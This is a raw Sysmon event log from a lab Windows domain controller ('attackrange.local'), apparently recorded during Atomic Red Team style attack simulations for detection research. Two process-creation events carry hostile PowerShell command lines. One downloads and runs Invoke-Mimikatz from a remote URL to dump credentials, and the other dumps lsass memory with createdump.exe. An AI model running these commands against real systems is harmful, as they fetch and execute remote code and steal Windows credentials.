21:10:29.874{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025805Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.874{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084872C:\Windows\system32\csrss.exe{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025804Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.874{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|UNKNOWN(00007FFF5BA1CD48) 154100x800000000000000025803Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.877{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {echo \""Createdump Path C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.*.*\createdump.exe\"" $LSASS = tasklist | findstr \""lsass\"" $FIELDS = $LSASS -split \""\s+\"" $ID = $FIELDS[1] & \""C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.*.*\createdump.exe\"" -u -f C:\Windows\Temp\dotnet-lsass.dmp $ID} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000025802Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.874{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 11241100x800000000000000025801Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.859{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000025800Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.827{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\art-err.txtMD5=B9033050A56B527AD5C3AD65BAC7626D,SHA256=9DBB8B1E214CD9311A1586951FB3BCCC60E7E70B3A7715E2381456DDF67592BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025799Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.719{4DB9351A-A345-60D3-6206-00000000CF01}6784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025798Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.250{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A345-60D3-6206-00000000CF01}6784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025797Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.250{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A345-60D3-6206-00000000CF01}6784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025796Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.218{4DB9351A-9DDB-60D3-0B00-00000000CF01}6284464C:\Windows\system32\lsass.exe{4DB9351A-A345-60D3-6206-00000000CF01}6784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025795Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.218{4DB9351A-9DDB-60D3-0B00-00000000CF01}6284464C:\Windows\system32\lsass.exe{4DB9351A-A345-60D3-6206-00000000CF01}6784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000025794Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:10:29.187{4DB9351A-A345-60D3-6206-00000000CF01}6784\PSHost.132689562290358870.6784.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025793Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.156{4DB9351A-A345-60D3-6206-00000000CF01}6784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_q50uhuj4.bkf.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025792Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.156{4DB9351A-A345-60D3-6206-00000000CF01}6784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_rhyvmwfu.0hq.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025791Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.140{4DB9351A-A345-60D3-6206-00000000CF01}6784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_rhyvmwfu.0hq.ps12021-06-23 21:10:29.140 10341000x800000000000000025790Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.093{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A345-60D3-6206-00000000CF01}6784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000025789Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.321{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61543-false10.0.1.12-8000- 354300x800000000000000025788Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.069{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-663.attackrange.local53domainfalse127.0.0.1win-dc-663.attackrange.local65525- 354300x800000000000000025787Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.038{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local65525- 354300x800000000000000025786Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.038{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local56270- 23542300x800000000000000025785Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.063{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F321730630652C8BA61092488D4EBB4,SHA256=86137ED727BFC6C5C9327242E3B9D3C842462957F4356F4C9DDF0B395197EF89,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025784Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.031{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A345-60D3-6206-00000000CF01}6784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025783Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.031{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A345-60D3-6206-00000000CF01}6784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025782Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.031{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025781Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.031{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025780Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.031{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025779Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.031{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025778Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.031{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084872C:\Windows\system32\csrss.exe{4DB9351A-A345-60D3-6206-00000000CF01}6784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025777Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.031{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A345-60D3-6206-00000000CF01}6784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|UNKNOWN(00007FFF5BA1CD48) 154100x800000000000000025776Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.035{4DB9351A-A345-60D3-6206-00000000CF01}6784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000025775Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.031{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 11241100x800000000000000025774Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.031{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000026076Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.988{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8589A038F58D1715FEDAFDA995B83F4B,SHA256=F91594E955A1970A1EE1A5CAF5ED1FC1BA26F25EDA41AB322BF9D66D51ED069B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000026075Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.957{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\art-out.txtMD5=7AB47AC79E82AFB391077C0193847ED2,SHA256=9CFF697F31268BA26570170E27E186652377C229ECF34094F12ADDC86E6DE702,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000026074Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.910{4DB9351A-A345-60D3-6306-00000000CF01}3656ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000026073Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 